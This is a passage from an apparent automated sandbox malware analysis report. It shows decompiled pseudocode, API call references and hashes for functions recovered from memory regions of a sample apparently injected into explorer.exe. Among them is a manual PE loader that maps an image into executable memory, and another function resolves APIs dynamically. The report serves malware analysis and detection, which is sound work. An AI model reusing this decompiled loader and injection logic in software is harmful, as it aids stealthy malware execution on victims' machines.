				 *0x411a14 = GetProcAddress(GetModuleHandleA(_v12), _v8);
				if( *0x411a14 != 0) {
					E003F8170( &_v12);
					E003F8170( &_v8);
					_push(_a4);
					_t18 = E003F7A30(_a4,  &E0040EF40); // executed
					return _t18;
				}
				while(0 != 0) {
				}
				E003F8170( &_v12);
				E003F8170( &_v8);
				return 0xfffffffe;
			}

0x003f7d03
0x003f7d13
0x003f7d2b
0x003f7d37
0x003f7d62
0x003f7d6e
0x003f7d79
0x003f7d7f
0x00000000
0x003f7d84
0x003f7d39
0x003f7d3d
0x003f7d43
0x003f7d4f
0x00000000

APIs

GetModuleHandleA.KERNEL32(003F7F26,00000838,?,?,003F7F26,00000838), ref: 003F7D1E
GetProcAddress.KERNEL32(00000000,?,?,003F7F26,00000838), ref: 003F7D25

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-0
Opcode ID: 075ac9310d93ca94d5a9a64154640f514a452115ee807d8e34393c820a286388
Instruction ID: e1c12eb30caf0b0daf691c9c20551abb2d479a0111cbea0bb061657a5c991187
Opcode Fuzzy Hash: 075ac9310d93ca94d5a9a64154640f514a452115ee807d8e34393c820a286388
Instruction Fuzzy Hash: 500144F9C0020CBBDF05EBA4AD469BE77689F14304F544579FB069A251FE31A71887A2

Uniqueness

Uniqueness Score: 0.10%

Function 01506692, Relevance: 3.0, APIs: 2, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8, long _a12) {
				void* _t9;
				long _t10;
				void* _t15;

				_t20 = _a8 - 1;
				if(_a8 != 1) {
					L6:
					__eflags = 1;
					return 1;
				}
				E01513940(); // executed
				_t9 = E01515080(_t20, 3); // executed
				if(_t9 >= 0) {
					__eflags = _a12;
					if(_a12 == 0) {
						goto L6;
					}
					_t10 = E0151EA30(_a4, _a12, 2); // executed
					__eflags = _t10;
					if(_t10 == 0) {
						goto L2;
					}
					E01519160(E01515770());
					_t15 = CreateThread(0, 0, E01506383, 0, 0,  &_a12); // executed
					 *0x1538a88 = _t15;
					goto L6;
				}
				L2:
				return 0;
			}

0x01506695
0x0150669a
0x015066ee
0x015066f0
0x00000000
0x015066f0
0x0150669c
0x015066a3
0x015066ab
0x015066b3
0x015066b6
0x00000000
0x00000000
0x015066c0
0x015066c8
0x015066ca
0x00000000
0x00000000
0x015066d1
0x015066e3
0x015066e9
0x00000000
0x015066e9
0x015066ad
0x00000000

APIs

Part of subcall function 01513940: HeapCreate.KERNEL32(00000000,00080000,00000000,?,015066A1), ref: 0151394C

Part of subcall function 01515080: memset.MSVCRT(?,00000000,0000003E), ref: 015150A6

__vprintf_l.LIBCMTD ref: 015066C0
CreateThread.KERNEL32(00000000,00000000,01506383,00000000,00000000,?), ref: 015066E3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Create$HeapThread__vprintf_lmemset
String ID:
API String ID: 1715215488-0
Opcode ID: 85ce160f34f91b57b9657e3bd342a77a3237769ed5ea2805d917fa23b141728f
Instruction ID: be2c6f47b2fc43628221e8031fb10c4ef1934237e79287f5c243b0a7be7c5b36
Opcode Fuzzy Hash: 85ce160f34f91b57b9657e3bd342a77a3237769ed5ea2805d917fa23b141728f
Instruction Fuzzy Hash: D5F09032551217ABEB23AEE59C05EAF7A9CBF526A0B000424F9048D584EAB0C130DBA0

Uniqueness

Uniqueness Score: 12.89%

Function 01518DB0, Relevance: 3.0, APIs: 2, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01518DB0(void* __ecx, WCHAR* _a4, long _a8) {
				void* _v8;
				void* _t10;

				_v8 = 0;
				_t10 = CreateFileW(_a4, 0x40000000, 0, 0, _a8, 0x80, 0); // executed
				_v8 = _t10;
				if(_v8 != 0xffffffff) {
					if(_a8 == 4) {
						SetFilePointer(_v8, 0, 0, 2);
					}
					return _v8;
				}
				return 0;
			}

0x01518db4
0x01518dd3
0x01518dd9
0x01518de0
0x01518dea
0x01518df6
0x01518df6
0x00000000
0x01518dfc
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,015184F7,00000080,00000000,?,?,015184F7,?), ref: 01518DD3
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 01518DF6

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: dd732ace1cad6dacc00cff827a51efbd33b96b8426d6ed8f8b397342b4480d24
Instruction ID: f3e849ab12fa1f01d90680e3c1a5d2fa26d46501baad0360ebd75ef51a3444ab
Opcode Fuzzy Hash: dd732ace1cad6dacc00cff827a51efbd33b96b8426d6ed8f8b397342b4480d24
Instruction Fuzzy Hash: EDF08275640308FBEB31CFA4DD05F5E77B4E704720F208144FA15AF2C0C6B5AA00AB84

Uniqueness

Uniqueness Score: 0.99%

Function 015244A0, Relevance: 3.0, APIs: 2, Instructions: 28
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015244A0(void* __ecx, int _a4) {
				int _t2;
				long _t3;
				void* _t4;
				int _t5;
				int _t6;

				_t4 = __ecx;
				_t2 =  *0x1538a80; // 0x50b3ec8e
				_t6 = _a4;
				if(_t2 != 0) {
					L7:
					return _t2;
				} else {
					_t3 = InterlockedIncrement(0x1538a84);
					if(_t3 != 1) {
						do {
							_t2 = SwitchToThread();
							_t5 =  *0x1538a80; // 0x50b3ec8e
							__eflags = _t5;
						} while (_t5 == 0);
						goto L7;
					} else {
						_t10 = _t6;
						if(_t6 == 0) {
							_t3 = E01524460(_t4, _t10); // executed
							_t6 = _t3;
						}
						 *0x1538a80 = _t6;
						return _t3;
					}
				}
			}

0x015244a0
0x015244a3
0x015244a9
0x015244ae
0x015244ee
0x015244ee
0x015244b0
0x015244b5
0x015244be
0x015244e0
0x015244e0
0x015244e2
0x015244e8
0x015244e8
0x00000000
0x015244c0
0x015244c0
0x015244c2
0x015244c4
0x015244c9
0x015244c9
0x015244cb
0x015244d3
0x015244d3
0x015244be

APIs

InterlockedIncrement.KERNEL32(01538A84,00000000,?,01521870,50B3EC8E,?,readrr956964,?), ref: 015244B5
SwitchToThread.KERNEL32(?,01521870,50B3EC8E,?,readrr956964,?), ref: 015244E0

Part of subcall function 01524460: _time64.MSVCRT(00000000,50B3EC8E,?,readrr956964,?), ref: 01524477
Part of subcall function 01524460: GetCurrentProcessId.KERNEL32(?,50B3EC8E,?,readrr956964,?), ref: 01524481

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentIncrementInterlockedProcessSwitchThread_time64
String ID:
API String ID: 4126509981-0
Opcode ID: 42f38a088bd3c313fcc42e118a3f65d71a315d7cb918c41960c793e2936897a7
Instruction ID: 6741a9a8a060565ae95a2d89237506e0e85be0bd1b9bd17164d7d7fefad90632
Opcode Fuzzy Hash: 42f38a088bd3c313fcc42e118a3f65d71a315d7cb918c41960c793e2936897a7
Instruction Fuzzy Hash: AAE09B3360133547CF36DE98F440A593B58BB416B4B0E4165FD1DDF645D3606808EBE0

Uniqueness

Uniqueness Score: 16.53%

Function 01524460, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E01524460(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _t4;
				signed int _t5;
				signed int _t9;

				_t4 = E01524390( &_v8); // executed
				if(_t4 == 0) {
					_t9 = _v8;
				} else {
					_push(0);
					L0152181E();
					_t9 = _t4 ^ GetCurrentProcessId();
				}
				_t5 = 1;
				if(_t9 != 0) {
					_t5 = _t9;
				}
				return _t5;
			}

0x01524469
0x01524473
0x0152448b
0x01524475
0x01524475
0x01524477
0x01524487
0x01524487
0x0152448e
0x01524495
0x01524497
0x01524497
0x0152449d

APIs

Part of subcall function 01524390: GetModuleHandleA.KERNEL32(advapi32.dll,01521870,?,01521870), ref: 015243A3

_time64.MSVCRT(00000000,50B3EC8E,?,readrr956964,?), ref: 01524477
GetCurrentProcessId.KERNEL32(?,50B3EC8E,?,readrr956964,?), ref: 01524481

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentHandleModuleProcess_time64
String ID:
API String ID: 1903434567-0
Opcode ID: 32a466aa55c0a12531079072b89e5f4fbddc796719a1924b742b6db98e3a56f4
Instruction ID: 29c5e067b2802cb760e2c5651ed4823f8eb82748224d97553b3b67320978de6b
Opcode Fuzzy Hash: 32a466aa55c0a12531079072b89e5f4fbddc796719a1924b742b6db98e3a56f4
Instruction Fuzzy Hash: DEE026B3E0013563EA2096E46C0078F769CAB062A0F050571ED06EF380F561ED0082D1

Uniqueness

Uniqueness Score: 16.53%

Function 01510C78, Relevance: 3.0, APIs: 2, Instructions: 13
UNIQUE

Download Yara Rule

C-Code - Quality: 79%

			E01510C78() {
				signed int _t1;
				signed int _t2;

				_t1 = QueryPerformanceFrequency(0x1538840); // executed
				if(_t1 != 0) {
					_t2 = QueryPerformanceCounter(0x1538830); // executed
					asm("sbb eax, eax");
					return  ~( ~_t2) - 1;
				} else {
					return _t1 | 0xffffffff;
				}
			}

0x01510c7d
0x01510c85
0x01510c90
0x01510c98
0x01510c9d
0x01510c87
0x01510c8a
0x01510c8a

APIs

QueryPerformanceFrequency.KERNEL32(01538840,01510C48,?,?,?,?,0150F0D7,YNNN,?,?,?,?,0150EB06,YNNNNNN), ref: 01510C7D
QueryPerformanceCounter.KERNEL32(01538830,?,?,?,?,0150F0D7,YNNN,?,?,?,?,0150EB06,YNNNNNN,?,?,015063A7), ref: 01510C90

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: d263dee8ca5208cb794102c9c5ce4cbc4d83aa94f3e68eb9e384941fb3d36575
Instruction ID: f40e31a11b23052b879c1f3383ac5e512a7f830191b730fecc44d7dfe123ae53
Opcode Fuzzy Hash: d263dee8ca5208cb794102c9c5ce4cbc4d83aa94f3e68eb9e384941fb3d36575
Instruction Fuzzy Hash: D0C08C313A020702AA321EB9E84E82976007B82BB33600B04F036CF0C8EBA08044E600

Uniqueness

Uniqueness Score: 100.00%

Function 003F60C0, Relevance: 2.7, APIs: 2, Instructions: 245
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E003F60C0(signed short* _a4, intOrPtr _a12) {
				void* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				short _v32;
				void* _v36;
				signed short* _v40;
				void* _v44;
				long _v48;
				char _v60;
				void* _t132;
				void* _t164;
				void* _t166;
				void* _t241;
				void* _t242;

				_v28 = 0;
				_v16 = 0;
				_v12 = 0;
				_v40 = 0;
				_v32 = 0;
				_v44 = 0;
				_v36 = 0;
				_v20 = 0;
				_v24 = 0;
				_v48 = 0;
				_v8 = 0;
				_v40 = _a4;
				if(( *_v40 & 0x0000ffff) == 0x5a4d) {
					_v44 = _a4 + _v40[0x1e];
					if( *_v44 == 0x4550) {
						if(( *(_v44 + 4) & 0x0000ffff) != 0x14c) {
							if(( *(_v44 + 4) & 0x0000ffff) != 0x8664) {
								while(0 != 0) {
								}
								return 0;
							}
							_v36 = _v44;
							_v44 = 0;
							while(0 != 0) {
							}
							_v20 =  *((intOrPtr*)(_v36 + 6));
							_v48 =  *((intOrPtr*)(_v36 + 0x50));
							L20:
							while(0 != 0) {
							}
							if(_a12 == 0) {
								_t132 = E003F3EE0(_v48, _v48); // executed
								_t241 = _t241 + 4;
								_v16 = _t132;
								if(_v16 != 0) {
									while(0 != 0) {
									}
									L45:
									if(_v36 == 0) {
										_t72 = _v40[0x1e] + 0xf8; // 0xf8
										_v24 = _a4 + _t72;
										E003F4040( *((intOrPtr*)(_v44 + 0x54)), _v16, _v40,  *((intOrPtr*)(_v44 + 0x54)));
										_t242 = _t241 + 0xc;
										_v8 =  *((intOrPtr*)(_v44 + 0x54));
									} else {
										_t59 = _v40[0x1e] + 0x108; // 0x108
										_v24 = _a4 + _t59;
										E003F4040(_v40, _v16, _v40,  *((intOrPtr*)(_v36 + 0x54)));
										_t242 = _t241 + 0xc;
										_v8 =  *(_v36 + 0x54);
									}
									_v12 = 0;
									while(1) {
										_t185 = _v20 & 0x0000ffff;
										if(_v12 >= (_v20 & 0x0000ffff)) {
											break;
										}
										E003F4120(_t185,  &_v60, 0, 9);
										E003F4040( &_v60,  &_v60, _v24 + _v12 * 0x28, 8);
										E003F4040(_v16 +  *((intOrPtr*)(_v24 + 0xc + _v12 * 0x28)), _v16 +  *((intOrPtr*)(_v24 + 0xc + _v12 * 0x28)), _a4 +  *((intOrPtr*)(_v24 + 0x14 + _v12 * 0x28)),  *((intOrPtr*)(_v24 + 0x10 + _v12 * 0x28)));
										_t242 = _t242 + 0x24;
										if(_a4 +  *((intOrPtr*)(_v24 + 0x14 + _v12 * 0x28)) +  *((intOrPtr*)(_v24 + 0x10 + _v12 * 0x28)) > _v28) {
											_v28 = _a4 +  *((intOrPtr*)(_v24 + 0x14 + _v12 * 0x28)) +  *((intOrPtr*)(_v24 + 0x10 + _v12 * 0x28));
										}
										_v12 = _v12 + 1;
									}
									while(0 != 0) {
									}
									return _v16;
								}
								while(0 != 0) {
								}
								return 0;
							}
							if(( *(_v44 + 4) & 0x0000ffff) != 0x14c) {
								L30:
								if(_v16 == 0) {
									_t164 = VirtualAlloc(0, _v48, 0x1000, 0x40); // executed
									_v16 = _t164;
								}
								if(_v16 != 0) {
									while(0 != 0) {
									}
									goto L45;
								} else {
									while(0 != 0) {
									}
									return 0;
								}
							}
							_t166 = VirtualAlloc( *(_v44 + 0x34), _v48, 0x1000, 0x40); // executed
							_v16 = _t166;
							if(_v16 == 0) {
								while(0 != 0) {
								}
								goto L30;
							}
							while(0 != 0) {
							}
							goto L30;
						}
						while(0 != 0) {
						}
						_v20 =  *((intOrPtr*)(_v44 + 6));
						_v48 =  *(_v44 + 0x50);
						goto L20;
					}
					while(0 != 0) {
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f60c6
0x003f60cd
0x003f60d4
0x003f60db
0x003f60e4
0x003f60e8
0x003f60ef
0x003f60f8
0x003f60fc
0x003f6103
0x003f610a
0x003f6114
0x003f6123
0x003f613b
0x003f6147
0x003f6163
0x003f618d
0x003f61b8
0x003f61bc
0x00000000
0x003f61be
0x003f6192
0x003f6195
0x003f619c
0x003f61a0
0x003f61a9
0x003f61b3
0x00000000
0x003f61c5
0x003f61c9
0x003f61cf
0x003f624a
0x003f624f
0x003f6252
0x003f6259
0x003f6268
0x003f626c
0x003f626e
0x003f6272
0x003f62b2
0x003f62b9
0x003f62cb
0x003f62d0
0x003f62d9
0x003f6274
0x003f627d
0x003f6284
0x003f6296
0x003f629b
0x003f62a4
0x003f62a4
0x003f62dc
0x003f62ee
0x003f62ee
0x003f62f5
0x00000000
0x00000000
0x003f6303
0x003f631b
0x003f6353
0x003f6358
0x003f637b
0x003f639a
0x003f639a
0x003f62eb
0x003f62eb
0x003f63a2
0x003f63a6
0x00000000
0x003f63a8
0x003f625b
0x003f625f
0x00000000
0x003f6261
0x003f61de
0x003f620f
0x003f6213
0x003f6222
0x003f6228
0x003f6228
0x003f622f
0x003f623e
0x003f6242
0x00000000
0x003f6231
0x003f6231
0x003f6235
0x00000000
0x003f6237
0x003f622f
0x003f61f2
0x003f61f8
0x003f61ff
0x003f6209
0x003f620d
0x00000000
0x003f6209
0x003f6201
0x003f6205
0x00000000
0x003f6207
0x003f6165
0x003f6169
0x003f6172
0x003f617c
0x00000000
0x003f617c
0x003f6149
0x003f614d
0x00000000
0x003f614f
0x003f6125
0x003f6129
0x00000000

APIs

VirtualAlloc.KERNEL32(?,00000000,00001000,00000040), ref: 003F61F2
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003F6222

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Alloc$Virtual$Heap
String ID:
API String ID: 3336714653-0
Opcode ID: f357eff6abf45391eabbfd8d9d9146cb0928888af13cdbdfef313395776d7d97
Instruction ID: 111597b66a9e675e9cae95edce7c16c0030ef87ed14ef9b784f73e1440d4ebf2
Opcode Fuzzy Hash: f357eff6abf45391eabbfd8d9d9146cb0928888af13cdbdfef313395776d7d97
Instruction Fuzzy Hash: BAA15C74E0410DEBCB09CF94D992AFEB7B1AF88304F248559D602BB391D7359A80CF65

Uniqueness

Uniqueness Score: 0.00%

Function 0150157C, Relevance: 2.6, APIs: 2, Instructions: 117
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0150157C(void* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr* _a12, short _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, char _a44, intOrPtr _a48) {
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t46;
				CHAR* _t63;
				void* _t68;
				void* _t69;
				void* _t72;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t67 = __ecx;
				_t75 = _a4;
				E01513BA0(__ecx, _t75, 0, 0x2682);
				_t77 = _t76 + 0xc;
				if(_a8 == 0) {
					L4:
					_t40 = _a12;
					if(_t40 != 0) {
						 *((intOrPtr*)(_t75 + 0x2664)) =  *_t40;
					}
					if(_a20 != 0) {
						E01513D60(_t67, _t75 + 0x2494, _a20, 0x20);
						_t77 = _t77 + 0xc;
					}
					 *(_t75 + 4) =  *(_t75 + 4) | 0xffffffff;
					 *(_t75 + 8) =  *(_t75 + 8) | 0xffffffff;
					 *((short*)(_t75 + 0x2668)) = _a16;
					if(_a24 != 0) {
						E01513D60(_t67, _t75 + 0x2474, _a24, 0x20);
						_t77 = _t77 + 0xc;
					}
					_t72 = 0x40;
					if(_a28 != 0) {
						E01513D60(_t67, _t75 + 0x24b4, _a28, _t72);
						_t77 = _t77 + 0xc;
					}
					if(_a32 != 0) {
						E01513D60(_t67, _t75 + 0x24f4, _a32, _t72);
						_t77 = _t77 + 0xc;
					}
					if(_a36 != 0) {
						E01513D60(_t67, _t75 + 0x2534, _a36, _t72);
						_t77 = _t77 + 0xc;
					}
					if(_a40 != 0) {
						E01513D60(_t67, _t75 + 0x2574, _a40, _t72);
					}
					 *((intOrPtr*)(_t75 + 0x25d6)) = _a48;
					 *((char*)(_t75 + 0x25d4)) = _a44;
					_t44 = E01513960(_t67, 0x20000);
					_pop(_t68);
					 *((intOrPtr*)(_t75 + 0x2460)) = _t44;
					if(_t44 == 0) {
						L20:
						_push(0xfffffffe);
						_pop(0);
						goto L22;
					} else {
						_t46 = E01513960(_t68, 0x20000);
						_pop(_t69);
						 *((intOrPtr*)(_t75 + 0x2468)) = _t46;
						if(_t46 != 0) {
							 *((intOrPtr*)(_t75 + 0x2470)) = 0x20000;
							E015011A5(_t69, _t75); // executed
							L22:
							return 0;
						}
						goto L20;
					}
				}
				_t63 = E01513960(_t67, lstrlenA(_a8) + 1);
				_pop(_t67);
				 *(_t75 + 0x2660) = _t63;
				if(_t63 != 0) {
					lstrcpyA(_t63, _a8);
					goto L4;
				}
				return _t63 | 0xffffffff;
			}

0x0150157c
0x01501581
0x0150158d
0x01501592
0x01501598
0x015015c7
0x015015c7
0x015015cc
0x015015d0
0x015015d0
0x015015d9
0x015015e7
0x015015ec
0x015015ec
0x015015f3
0x015015f7
0x015015fb
0x01501605
0x01501613
0x01501618
0x01501618
0x0150161e
0x01501622
0x0150162f
0x01501634
0x01501634
0x0150163a
0x01501647
0x0150164c
0x0150164c
0x01501652
0x0150165f
0x01501664
0x01501664
0x0150166a
0x01501677
0x0150167c
0x01501682
0x01501691
0x01501697
0x0150169c
0x0150169d
0x015016a5
0x015016b8
0x015016b8
0x015016ba
0x00000000
0x015016a7
0x015016a8
0x015016ad
0x015016ae
0x015016b6
0x015016be
0x015016c4
0x015016cc
0x00000000
0x015016cc
0x00000000
0x015016b6
0x015016a5
0x015015a5
0x015015aa
0x015015ab
0x015015b3
0x015015c1
0x00000000
0x015015c1
0x00000000

APIs

lstrcpyA.KERNEL32(00000000,?), ref: 015015C1
lstrlenA.KERNEL32(?), ref: 0150159D

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AllocHeaplstrcpylstrlen
String ID:
API String ID: 2572858952-0
Opcode ID: aaef73a8160b8e03028c0a650887cc4462bc6cfa6ca42ef053214bf07b54ee11
Instruction ID: b70a155167f0c9f93ed5c069328718000d4a2156af16808e3a362365082af0b8
Opcode Fuzzy Hash: aaef73a8160b8e03028c0a650887cc4462bc6cfa6ca42ef053214bf07b54ee11
Instruction Fuzzy Hash: 96418571804A4BABDF329FB8DC88C9A3BF8BB55324F040939F96A9A190D731D145CB55

Uniqueness

Uniqueness Score: 0.29%

Function 0151B400, Relevance: 2.6, APIs: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(000000FF), ref: 0151B485
CloseHandle.KERNEL32(000000FF), ref: 0151B547

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 48c4aa648ef3a3ea1d0591e1dfd367d3418a7192d316ee0e16eee4d0388f3d53
Instruction ID: 8a7d008e2aa992410dbb97f32298392e9e0197b11e3bf44d27c87cf51adfca8d
Opcode Fuzzy Hash: 48c4aa648ef3a3ea1d0591e1dfd367d3418a7192d316ee0e16eee4d0388f3d53
Instruction Fuzzy Hash: E93190719012188BEB32DF28DC44BED77B5BB08314F0086D8E55AAF289E7B49B94CF51

Uniqueness

Uniqueness Score: 0.03%

Function 003F4290, Relevance: 2.6, APIs: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(000000FF), ref: 003F4315
CloseHandle.KERNEL32(000000FF), ref: 003F43D7

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e62cc1933ed01e44e606544ce65c742673c421bfe3354e70b956dd7fddaa244d
Instruction ID: 1d68bd7a7c4d643f8a52e9d894306720ddef2dea911449d3dc22a5af2f35b04f
Opcode Fuzzy Hash: e62cc1933ed01e44e606544ce65c742673c421bfe3354e70b956dd7fddaa244d
Instruction Fuzzy Hash: C2314174A0221C9BCB21CB64DC85BFE77B8AF08315F1086E6E71996690D7749BA4CF41

Uniqueness

Uniqueness Score: 0.03%

Function 0151E4E0, Relevance: 2.6, APIs: 2, Instructions: 67
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0151E4E0(intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				int _t44;

				_v12 = _a8;
				_v8 = 0;
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v12[1]) {
					_v20 = 0;
					_v16 = 0;
					while(_v16 <  *((intOrPtr*)(_v12[2] + (_v8 << 4) + 8))) {
						_t44 = lstrcmpiA(_a4 + 0x24,  *( *((intOrPtr*)(_v12[2] + (_v8 << 4) + 0xc)) + _v16 * 4)); // executed
						if(_t44 != 0) {
							_v16 = _v16 + 1;
							continue;
						} else {
							 *_v12 =  *_v12 |  *(_v12[2] + (_v8 << 4));
							while(0 != 0) {
							}
						}
						break;
					}
					if(_v20 == 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
					}
					break;
				}
				Sleep(0xa); // executed
				return 1;
			}

0x0151e4e9
0x0151e4ec
0x0151e4f3
0x0151e4fa
0x0151e50c
0x0151e51b
0x0151e522
0x0151e534
0x0151e567
0x0151e56f
0x0151e531
0x00000000
0x0151e571
0x0151e588
0x0151e58a
0x0151e58e
0x0151e590
0x00000000
0x0151e56f
0x0151e598
0x0151e509
0x00000000
0x00000000
0x0151e59a
0x00000000
0x0151e598
0x0151e5a3
0x0151e5b1

APIs

lstrcmpiA.KERNEL32(?,?), ref: 0151E567
Sleep.KERNEL32(0000000A), ref: 0151E5A3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: 9d11d1d08e8fe9065b171cfb7f709e101ab378f2ec71d808f548566f3340959c
Instruction ID: fbeb813239ab1e14be8f4998dd2ec7ab04dd2f469e5bbe7a1019d5c5f96471be
Opcode Fuzzy Hash: 9d11d1d08e8fe9065b171cfb7f709e101ab378f2ec71d808f548566f3340959c
Instruction Fuzzy Hash: B221D674A04208EFEB16CF88C195BADBBB1FB48308F158599D816AF345E731EA41CF41

Uniqueness

Uniqueness Score: 2.28%

Function 003F25E0, Relevance: 1.6, APIs: 1, Instructions: 54
threadCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E003F25E0(void* __ecx) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				void* _t13;
				void* _t20;

				_t20 = __ecx;
				_v12 = 0xfffffff6;
				_v8 = 0;
				while(0 != 0) {
				}
				_v8 = E003F8060(_t20, 0x15f);
				if(_v8 != 0) {
					 *0x40f6c0 = E003F4E30(_v8, 0x3b, 0, 0x40f6b8);
					E003F8170( &_v8);
					while(0 != 0) {
					}
				}
				_t13 = CreateThread(0, 0, E003F2690, 0, 0,  &_v16); // executed
				 *0x40f6bc = _t13;
				if( *0x40f6bc != 0) {
					while(0 != 0) {
					}
					E003F2270(); // executed
					_v12 = 0;
				} else {
					while(0 != 0) {
					}
					_v12 = 0xfffffffe;
				}
				return _v12;
			}

0x003f25e0
0x003f25e6
0x003f25ed
0x003f25f4
0x003f25f8
0x003f2607
0x003f260e
0x003f2625
0x003f262e
0x003f2636
0x003f263a
0x003f2636
0x003f264d
0x003f2653
0x003f265f
0x003f2670
0x003f2674
0x003f2676
0x003f267b
0x003f2661
0x003f2661
0x003f2665
0x003f2667
0x003f2667
0x003f2688

APIs

CreateThread.KERNEL32(00000000,00000000,003F2690,00000000,00000000,?), ref: 003F264D

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2150ce55818672c622526eefb1a174bbdbd2d1bbc43c4efad2387575c64e9213
Instruction ID: 24a5fddd062fe3f3cc2c3f50f99847cf0f11131e259d23e68fb765552eb92f85
Opcode Fuzzy Hash: 2150ce55818672c622526eefb1a174bbdbd2d1bbc43c4efad2387575c64e9213
Instruction Fuzzy Hash: FB1182B094430CFADB22DBA09D06B7F7664A700704F204679E702EA6D1EAF15A059A59

Uniqueness

Uniqueness Score: 0.06%

Function 01514F30, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01514F30(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t22;
				void* _t36;
				void* _t41;

				_v8 = 0;
				_v8 = 0;
				while(_v8 < _a24) {
					_t22 = E01514FB0(_t41, _a4, _a8, _a12, _a16, _a20, _a28); // executed
					_t36 = _t36 + 0x18;
					_v12 = _t22;
					if(_v12 < 0 && _v8 < _a24 - 1) {
						SleepEx((_v8 + 1) * 0x7d0, 1);
